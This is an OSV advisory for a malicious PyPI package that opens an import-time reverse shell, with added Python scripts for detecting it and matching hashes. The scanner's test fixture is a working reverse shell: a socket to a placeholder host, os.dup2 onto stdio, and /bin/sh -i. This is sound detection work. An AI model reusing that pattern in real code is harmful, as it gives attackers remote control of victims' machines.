MAL-2026-6233

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/fluent-dashboard-panel-metrics/MAL-2026-6233.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6233
Published
2026-06-20T01:07:05Z
Modified
2026-06-20T03:31:00.636601707Z
Summary
Malicious code in fluent-dashboard-panel-metrics (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (9e745c609fb43daaa93911ae2edcb05b1ffd3cec1c6ec55c321597e9e39eb153)

fluent_panel_metrics/__init__.py defines an undocumented function _bootstrap_runtime_profile() and invokes it unconditionally at module top level. The function opens a TCP socket to 34.69.137.236 on port 80/443, duplicates the socket file descriptor over stdin/stdout/stderr via os.dup2, and execs /bin/sh -i via subprocess.call, handing an interactive shell to the remote endpoint. The function is not listed in __all__ and is not referenced in the README, which advertises the package as a dashboard panel/grid helper (PanelGrid, normalizemargin, scaleforbreakpoint, panelversion). Any process that imports this package — including build systems, test runners, or downstream applications — will establish a reverse shell to the attacker on a default install + import. The advertised functionality is cover for a backdoor; the package's only install-relevant effect is remote attacker access.

Source: kam193 (7b6ebe4856f2e752a8a410e04066fe9549c08c220567169c2a50f9d50a328031)

During import, the package starts a reverse shell.


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-acme-widget-layout-utils

Reasons (based on the campaign):

  • The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.
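The import-time reverse shell that both sources describe has a recognisable static shape: a module-level function that opens a socket, calls os.dup2 onto the standard descriptors and spawns a shell, followed by an unconditional call to that function at module top level. The scanner below is an added example and is not code from the advisory, from either source, or from the package. The module it parses is a constructed stand-in that mirrors the described pattern (with a TEST-NET address in place of the real IOC) and is only parsed, never executed.

```python
"""Flag Python modules that run a socket + os.dup2 + shell pattern at import time."""
import ast

# Constructed sample mirroring the pattern the advisory describes. It is parsed
# only, never executed, and is NOT the package's own code. 192.0.2.10 is a
# TEST-NET address used instead of the real IOC.
SAMPLE_MODULE = '''
import os, socket, subprocess

__all__ = ["PanelGrid"]

class PanelGrid:
    pass

def _bootstrap_runtime_profile():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.0.2.10", 443))
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)
    subprocess.call(["/bin/sh", "-i"])

_bootstrap_runtime_profile()
'''

# Shell binaries whose appearance as a string argument to a process-spawning
# call counts as the "shell" indicator.
SHELL_PATHS = {"/bin/sh", "/bin/bash", "sh", "bash", "cmd.exe", "powershell"}


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _string_constants(node):
    """Yield every string literal anywhere under node."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
            yield sub.value


def function_indicators(func):
    """Which reverse-shell building blocks a FunctionDef body uses."""
    found = set()
    for sub in ast.walk(func):
        if not isinstance(sub, ast.Call):
            continue
        name = _dotted(sub.func) or ""
        if name in ("socket.socket", "socket.create_connection"):
            found.add("socket")          # outbound connection
        elif name == "os.dup2":
            found.add("dup2")            # stdio redirected onto the socket
        elif name.startswith(("subprocess.", "os.exec", "os.system", "pty.spawn")):
            if any(s in SHELL_PATHS for s in _string_constants(sub)):
                found.add("shell")       # interactive shell handed to the peer
    return found


def find_import_time_reverse_shells(source):
    """Functions showing all three indicators that are also called at module top level."""
    tree = ast.parse(source)
    suspicious = {}
    exported = set()
    for node in tree.body:
        if isinstance(node, ast.FunctionDef):
            ind = function_indicators(node)
            if {"socket", "dup2", "shell"} <= ind:
                suspicious[node.name] = ind
        elif isinstance(node, ast.Assign) and any(_dotted(t) == "__all__" for t in node.targets):
            exported = set(_string_constants(node.value))
    hits = []
    for node in tree.body:
        # A bare call statement at module level executes on import.
        if isinstance(node, ast.Expr) and isinstance(node.value, ast.Call):
            name = _dotted(node.value.func)
            if name in suspicious:
                hits.append({
                    "function": name,
                    "exported": name in exported,   # False: hidden from __all__
                    "indicators": sorted(suspicious[name]),
                })
    return hits


if __name__ == "__main__":
    for hit in find_import_time_reverse_shells(SAMPLE_MODULE):
        print(hit)
```

Run it over every `__init__.py` in a vendored tree or a freshly unpacked wheel before the package is ever imported; the check is deliberately narrow (all three indicators plus a top-level call) so it reports this class of backdoor rather than every module that happens to open a socket. Obfuscated variants (base64-decoded source, `getattr` on the module, `exec`) will not match an AST check like this and need dynamic analysis in a sandbox.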
Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "7b6ebe4856f2e752a8a410e04066fe9549c08c220567169c2a50f9d50a328031",
            "source": "kam193",
            "modified_time": "2026-06-20T01:07:05.776226Z",
            "versions": [
                "0.1.0"
            ],
            "id": "pypi/2026-06-acme-widget-layout-utils/fluent-dashboard-panel-metrics",
            "import_time": "2026-06-20T01:50:18.846151341Z"
        },
        {
            "sha256": "9e745c609fb43daaa93911ae2edcb05b1ffd3cec1c6ec55c321597e9e39eb153",
            "source": "amazon-inspector",
            "modified_time": "2026-06-20T03:10:32Z",
            "id": "IN-MAL-2026-007089",
            "versions": [
                "0.1.0"
            ],
            "import_time": "2026-06-20T03:14:16.688019942Z"
        }
    ],
    "iocs": {
        "ips": [
            "34.69.137.236"
        ]
    }
}
Affected packages

PyPI / fluent-dashboard-panel-metrics

Package

Name
fluent-dashboard-panel-metrics
Purl
pkg:pypi/fluent-dashboard-panel-metrics

Affected ranges

Affected versions

0.*
0.1.0

Database specific

cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/fluent-dashboard-panel-metrics/MAL-2026-6233.json"
indicators
{
    "evidence_files": [
        {
            "sha256": "4be270eb047f8f6bed6bd8d162034d0d70546d95583b00fab187200cea6e8e3b",
            "tlsh": "6431ed56ed34d5abd573da2628d3a0427b1669831a8824bb3fbcc3241f130a756f1dec",
            "path": "fluent_panel_metrics/__init__.py"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha256": "d75fd47e46d3c77e115620b5b5cac689c4081dff7db9838f8d783884450d1435",
                "blake2b_256": "861504c9b7fbe2b6f595ee8ee4fda691b74c96083a79711f9e5e05d05f57c370",
                "md5": "8e5171bd7cc73d981c83bdc9f042db86"
            },
            "filename": "fluent_dashboard_panel_metrics-0.1.0-py3-none-any.whl"
        }
    ]
}
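The package_integrity hashes and the 0.* affected range above can be checked mechanically. The script below is an added example, not part of the advisory or the ossf/malicious-packages tooling: it compares a wheel file's digests against the listed hashes and scans the running interpreter's installed distributions for any 0.x release of the package. Project names are normalised per PEP 503 so that fluent_dashboard_panel_metrics and fluent-dashboard-panel-metrics match.

```python
"""Match a wheel against the advisory's package_integrity hashes and find affected installs."""
import hashlib
import re
from importlib import metadata

# Digests copied from the advisory's package_integrity entry for
# fluent_dashboard_panel_metrics-0.1.0-py3-none-any.whl.
ADVISORY_HASHES = {
    "sha256": "d75fd47e46d3c77e115620b5b5cac689c4081dff7db9838f8d783884450d1435",
    "blake2b_256": "861504c9b7fbe2b6f595ee8ee4fda691b74c96083a79711f9e5e05d05f57c370",
    "md5": "8e5171bd7cc73d981c83bdc9f042db86",
}
AFFECTED_NAME = "fluent-dashboard-panel-metrics"


def hashes_of(data):
    """sha256, blake2b-256 and md5 of a byte string, keyed like the advisory."""
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "blake2b_256": hashlib.blake2b(data, digest_size=32).hexdigest(),
        "md5": hashlib.md5(data).hexdigest(),
    }


def file_hashes(path):
    """Digests of a file on disk (wheels are small enough to read whole)."""
    with open(path, "rb") as f:
        return hashes_of(f.read())


def matches_advisory(hashes, expected=ADVISORY_HASHES):
    """True only if every digest the advisory lists agrees with the file's."""
    return all(hashes.get(k) == v for k, v in expected.items())


def normalize(name):
    """PEP 503 normalisation, so underscores, dots and case do not hide a match."""
    return re.sub(r"[-_.]+", "-", name).lower()


def is_affected(name, version):
    """Affected range is 0.* (0.1.0 is the only version the advisory lists)."""
    return normalize(name) == AFFECTED_NAME and version.split(".")[0] == "0"


def installed_hits():
    """(name, version) for every affected distribution visible to this interpreter."""
    hits = []
    for dist in metadata.distributions():
        name = dist.metadata["Name"]
        if name and is_affected(name, dist.version):
            hits.append((name, dist.version))
    return sorted(hits)


if __name__ == "__main__":
    import sys
    for wheel in sys.argv[1:]:
        verdict = "MATCHES advisory" if matches_advisory(file_hashes(wheel)) else "does not match"
        print(wheel, verdict)
    print("affected distributions installed:", installed_hits() or "none")
```

A hash match identifies the exact flagged artifact (useful for pip caches, artifact mirrors and CI caches); a name-and-version match in installed_hits() is the broader signal, since the whole 0.* range is affected regardless of which file was installed. Either result should be treated as a confirmed compromise of that host, not merely as a package to uninstall, because the shell runs on first import.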